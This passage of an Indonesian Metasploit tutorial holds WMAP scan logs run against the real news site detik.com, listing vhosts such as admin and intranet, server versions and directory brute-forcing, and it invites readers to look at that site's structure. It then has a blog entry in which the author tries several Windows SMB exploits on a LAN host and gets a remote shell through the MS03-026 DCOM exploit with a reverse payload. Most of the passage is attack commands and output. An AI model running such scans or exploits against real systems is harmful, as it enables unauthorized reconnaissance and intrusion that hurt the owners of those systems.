| +------jquery-1.2.6.min.js[*] Done.msf > wmap_targets -s 2msf > wmap_website[*] Website structure[*] 202.158.66.164:80 SSL:0ROOT_TREE| images| +------telkomsel-280x175.gif| +------banner-detik-rev-final.gif| +------1x1.gif| +------promocontinue_4.swf| delivery| +------spcjs.php| +------lg.php| +------spc.php| +------fl.js[*] Done.msf > wmap_targets -s 3msf > wmap_website[*] Website structure[*] 202.158.66.86:80 SSL:0ROOT_TREE| css| +------allslider.css| +------detikcom.css| +------pollingsmsorange02.css| +------alltabs.css| images| | content| | | blog| | | | -| | | | +------20081219172849_blog.jpg| | | | +------20081219115448_blog.jpg| | | | +------20081219134455_blog.jpg| | | 2008| | | | 12| | | | | 22| | | | | | 71| | | | | | +------SpallettiAFP-cov.jpg| | | | | | +------ranieri-cov.jpg| | | | | | 72| | | | | | +------ArsenalPool-EddieKeogh200.jpg| | | | | | 73| | | | | | +------vandersar-cover.jpg| | | | | | 75| | | | | | +------Sevilla-Reuters200.jpg| | | | | | +------BarcaDiegoTusonAFP-cov.jpg| | | | | | 10| | | | | | +------wir-cover.jpg| | | | | 21| | | | | | 648| | | | | | +------toyota-depan.JPG| | | | | | 288| | | | | | +------RumahDurian.jpg| | | | | | 157| | | | | | +------coverpknu.jpg| | | | | | +------coverateror.jpg| | | | | | +------coverpolis.jpg| | video| | | 2008

Page 24: Tutorial it Framework- Masuk System LaN

| | | | 12| | | | +------081221483.png| image| +------iring808.gif| +------icn_jwb.gif| +------arrow_up.gif| +------ticketboxlogo.gif| +------logodetikcomfooter.gif| +------pollwpdetik.gif| +------spacer.gif| +------iconvideo.gif| +------logodetikcom.gif| +------Logo_25wht.gif| +------song_icon.gif| +------arrow_down.gif| +------tvwp.swf| +------iconphoto.gif| +------rssfeed_s.gif| +------panahforumwp.gif| +------bgregional6a.gif| +------bgticketbox.gif| +------bgdetikmap.gif| +------bgtapoff6a.gif| +------radioplayer.gif| +------bgpollsmsorange.gif| +------bgtapon6a.gif| +------pollingsmscenter.jpg| +------rss.gif| +------tanyasajalogo.gif| +------bgmenuatas.gif| +------tanya.gif| +------detikpublishinglogo.gif| +------bgmaplokasi.gif| +------bgcontent.gif[*] Done.msf > wmap_targets -s 4msf > wmap_website[*] Website structure[*] 202.158.66.20:80 SSL:0ROOT_TREE| content_image| | 2008| | | 12| | | | 20| | | | | 283| | | | | +------20081220-andini-k.jpg| | | | | 471| | | | | +------wanita-k.jpg[*] Done.msf > wmap_targets -s 5msf > wmap_website[*] Website structure[*] 202.158.66.190:80 SSL:0ROOT_TREE| images| | content| | | 2008| | | | 12| | | | | 18| | | | | | 238| | | | | | +------bantuan-luar.jpg

Page 25: Tutorial it Framework- Masuk System LaN

[*] Done.msf > wmap_targets -s 6msf > wmap_website[*] Website structure[*] 202.158.66.54:80 SSL:0ROOT_TREE| images| | wp| | +------Telkomsel-200x300.swf| | +------alexa_200x300b.gif| | +------BannerFLEXISPEEDY_300x250-01.swf| | +------wp-detik-magicaccess2.swf| | +------wp1-XLSolution-338x200.swf| | +------StarTV-19-338x133.swf| | +------StarTV-19-338x30.swf| | +------BannerBudpar875x100-01.swf| | +------Banner_Detik_Agustus_08.jpg[*] Done.msf > wmap_targets -s 7msf > wmap_website[*] Website structure[*] 202.158.66.24:80 SSL:0ROOT_TREE| static| | detikcom1| | +------toppariwaradetikcom.php[*] Done. msf > wmap_run -t[*] Loaded auxiliary/scanner/http/version ...[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...[*] Loaded auxiliary/scanner/http/frontpage_login ...[*] Loaded auxiliary/scanner/http/frontpage ...[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...[*] Loaded auxiliary/scanner/http/wmap_backup_file ...[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...[*] Loaded auxiliary/scanner/http/writable ...[*] Loaded auxiliary/scanner/http/wmap_files_dir ...[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...[*] Analysis completed in 1.00374484062195 seconds.[*] Done. msf > wmap_targets -s 3msf > wmap_targets -p[*] Id. Host Port SSL[*] 1. 202.158.66.94 80[*] 2. 202.158.66.164 80[*] => 3. 202.158.66.86 80[*] 4. 202.158.66.20 80[*] 5. 202.158.66.190 80[*] 6. 202.158.66.54 80[*] 7. 202.158.66.24 80[*] 8. 64.233.183.127 80[*] Done. msf > setg VHOST www.detik.com

Page 26: Tutorial it Framework- Masuk System LaN

VHOST => www.detik.commsf > setg DOMAIN detik.comDOMAIN => detik.commsf > setg EXT .phpEXT => .php msf > wmap_run -e[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 202.158.66.86:80 [*] Sending request with random domain LtELt.detik.com[*] Vhost found admin.detik.com[*] Vhost found services.detik.com[*] Vhost found webmail.detik.com[*] Vhost found console.detik.com[*] Vhost found apps.detik.com[*] Vhost found mail.detik.com[*] Vhost found intranet.detik.com[*] Vhost found intra.detik.com[*] Vhost found corporate.detik.com[*] Vhost found www.detik.com[*] Vhost found web.detik.com[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 202.158.66.86:80[*] http://202.158.66.86:80/ may not support FrontPage Server Extensions[*] Launching auxiliary/scanner/http/version WMAP_SERVER against 202.158.66.86:80[*] 202.158.66.86 is running Apache/2.2.9 (Unix) DAV/2 PHP/5.1.6 ( Powered by PHP/5.1.6 )[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 202.158.66.86:80[*] http://202.158.66.86:80 is running Apache/2.2.4 (Unix) DAV/2 PHP/5.1.6[*] FrontPage not found on http://202.158.66.86:80 [404 Not Found][*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 202.158.66.86:80[*] Error: 202.158.66.86 unknown protocol[*] Launching auxiliary/scanner/http/wmap_brute_dirs WMAP_DIR / against 202.158.66.86:80...[*] Running..[*] NOT Found http://202.158.66.86:/Aaa/ 404[*] NOT Found http://202.158.66.86:/Aab/ 404[*] NOT Found http://202.158.66.86:/Aac/ 404... ... ... msf > wmap_reports -p[*] Id. Created Target (host,port,ssl)19. Mon Dec 22 00:29:25 +0300 2008 202.158.66.86,,018. Mon Dec 22 00:29:19 +0300 2008 202.158.66.86,80,04. Mon Dec 22 00:22:31 +0300 2008 202.158.66.86,80,01. Mon Dec 22 00:00:21 +0300 2008 64.233.183.127,80,0[*] Done.msf > wmap_reports -s 19WMAP REPORT: 202.158.66.86,,0 Metasploit WMAP Report [Mon Dec 22 00:29:25 +0300 2008]VHOST NAME: admin.detik.com Vhost admin.detik.com found. [Mon Dec 22 00:29:25 +0300 2008]

Page 27: Tutorial it Framework- Masuk System LaN

VHOST NAME: services.detik.com Vhost services.detik.com found. [Mon Dec 22 00:29:27 +0300 2008]VHOST NAME: webmail.detik.com Vhost webmail.detik.com found. [Mon Dec 22 00:29:31 +0300 2008]VHOST NAME: console.detik.com Vhost console.detik.com found. [Mon Dec 22 00:29:32 +0300 2008]VHOST NAME: apps.detik.com Vhost apps.detik.com found. [Mon Dec 22 00:29:34 +0300 2008]VHOST NAME: mail.detik.com Vhost mail.detik.com found. [Mon Dec 22 00:29:38 +0300 2008]VHOST NAME: intranet.detik.com Vhost intranet.detik.com found. [Mon Dec 22 00:29:39 +0300 2008]VHOST NAME: intra.detik.com Vhost intra.detik.com found. [Mon Dec 22 00:29:41 +0300 2008]VHOST NAME: corporate.detik.com Vhost corporate.detik.com found. [Mon Dec 22 00:29:42 +0300 2008]VHOST NAME: www.detik.com Vhost www.detik.com found. [Mon Dec 22 00:29:45 +0300 2008]VHOST NAME: web.detik.com Vhost web.detik.com found. [Mon Dec 22 00:29:46 +0300 2008][*] Done.msf > wmap_reports -s 18WMAP REPORT: 202.158.66.86,80,0 Metasploit WMAP Report [Mon Dec 22 00:29:19 +0300 2008]WEB_SERVER TYPE: Apache/2.2.9 (Unix) DAV/2 PHP/5.1.6 ( Powered by PHP/5.1.6 ) [Mon Dec 22 00:29:57 +0300 2008][*] Done.

Itulah beberapa contoh penggunaan WMAP metasploit. Dan seperti biasa, metasploit bukanlah tools ajaib yang dengan konfigurasi standard (baca: donlot langsung pakai) dapat memuaskan para kiddies. Metasploit Framework adalah suatu framework yang memberikan lingkungan luar biasa bagi mereka-mereka yang dapat memanfaatkannya dengan sangat baik. Jangan heran jika banyak yang memiliki plugin-plugin ataupun exploit-exploit pribadi dengan metasploit framework mereka sendiri tanpa mem-publishnya kepada umum. WMAP saat ini merupakan project awal metasploit untuk penetrasi aplikasi web, dengan sifatnya yang opensource maka dalam beberapa waktu dapat kita ramalkan banyak modul-modul yang akan ditambahkan.

Untuk kalian yang hobi bermain-main dengan aplikasi web dan mencari tools yang dapat membantu proses tersebut secara otomatis serta dapat dikustomisasi maka WMAP metasploit adalah salah satu pilihan yang baik.

PS: ada yang memperhatikan bahwa detik.com memiliki struktur yang cukup unik dan menarik?

Page 28: Tutorial it Framework- Masuk System LaN

Lagi Jajal Metasploit   Framework Dah lama gw punya Metasploit, cuma masih bingung ini gunanya bwt apa, toh lom perna coba sama skali.Dari Cerita2 kalo Metasploit tuh gunanya byk, salah satu-nya untuk masuk ke dalam system komputer orang alias hack. Dah mulai deh gw Install dulu Metasploit Framework (Gw pake yg versi terbaru 3.1)Target pertama gw bwt jajal pake win 2000 aja bwt asal bisa masukMulai deh gw jalanin Metasploit 3 GUI Dan gw mulai pencarian exploit yg cocok bwt win 2000. Di situ dapet banyak, saking banyak nya gw sampe bingung yg mana yg bisa bwt gw pake untuk masuk ke dalam windows target gw. Akhirnya daripada bingung gw coba maen cleck-click tanpa baca2 terlebih dahulu. dah hasil nya:04:05:34 - Initialized the Metasploit Framework GUI.04:05:18 - ms04_031_netdde [*] Launching exploit windows/smb/ms04_031_netdde…04:05:19 - ms04_031_netdde [*] Started bind handler04:05:20 - ms04_031_netdde [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Gagal……)04:05:39 - ms04_031_netdde [*] Launching exploit windows/smb/ms04_031_netdde…04:05:40 - ms04_031_netdde [*] Started bind handler04:05:51 - ms04_031_netdde [-] Exploit failed: The connection timed out (192.168.30.217:445). (Gagal lagi…)04:05:29 - msdns_zonename [*] Launching exploit windows/smb/msdns_zonename…04:05:30 - msdns_zonename [*] Started bind handler04:05:31 - msdns_zonename [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Gagal Lagi..)04:05:56 - ms06_025_rras [*] Launching exploit windows/smb/ms06_025_rras…04:05:57 - ms06_025_rras [*] Started bind handler04:05:58 - ms06_025_rras [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Gagal mulu..)04:05:41 - ms04_011_lsass [*] Launching exploit windows/smb/ms04_011_lsass…04:05:42 - ms04_011_lsass [*] Started reverse handler04:05:43 - ms04_011_lsass [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Gagal lagi dah mulai bt..)04:05:59 - ms04_007_killbill [*] Launching exploit windows/smb/ms04_007_killbill…04:05:00 - ms04_007_killbill [*] Started reverse handler04:05:01 - ms04_007_killbill [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Akhirnya Gagal lagi …)- Ampun dah … gak ada yg bisa masuk, cupu bgt dah gw- Mulai Lirik-lirik jam, udah jam 4 pagi liwat- Coba lagi cari referensi tutorial di google- Dapet, tapi dsitu pakenya Metasploit 2.7 ** Untung perna download jg yg versi lama nya- Lansung aja ga pake lama Gw Uninstall yg v3.1 & install lagi yg v2.7- Gw jalan lewat console “MSFConsole”, seperti di bawah ini:+ — –=[ msfconsole v2.7 [157 exploits - 76 payloads]

msf > use msrpc_dcom_ms03_026msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reversePAYLOAD -> win32_reversemsf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.20.217RHOST -> 192.168.20.217msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.20.7

Page 29: Tutorial it Framework- Masuk System LaN

LHOST -> 192.168.20.7msf msrpc_dcom_ms03_026(win32_reverse) > exploit[*] Starting Reverse Handler.[*] Sending request…[*] Got connection from 192.168.20.7:4321 <-> 192.168.20.217:1028

Microsoft Windows 2000 [Version 5.00.2195] <<= masuk juga(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>ipconfigipconfig

Windows 2000 IP Configuration

Ethernet adapter Bounvil:

Connection-specific DNS Suffix . :IP Address. . . . . . . . . . . . : 192.168.20.217Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.20.100

C:\WINNT\system32>Akhirnya bisa jg masuk ke windows 2000.. Padahal kalo mo make KaHT malah lebih gampang bwat masuk ke win 2000, tp kalo ke xp ga bisa.Dah ahh, skrng dah jam 5.45 waktu kelapa Gading, sekarang jam nya tidur, bsok pagi hrus kerja lg .. Bu byee…cmiiw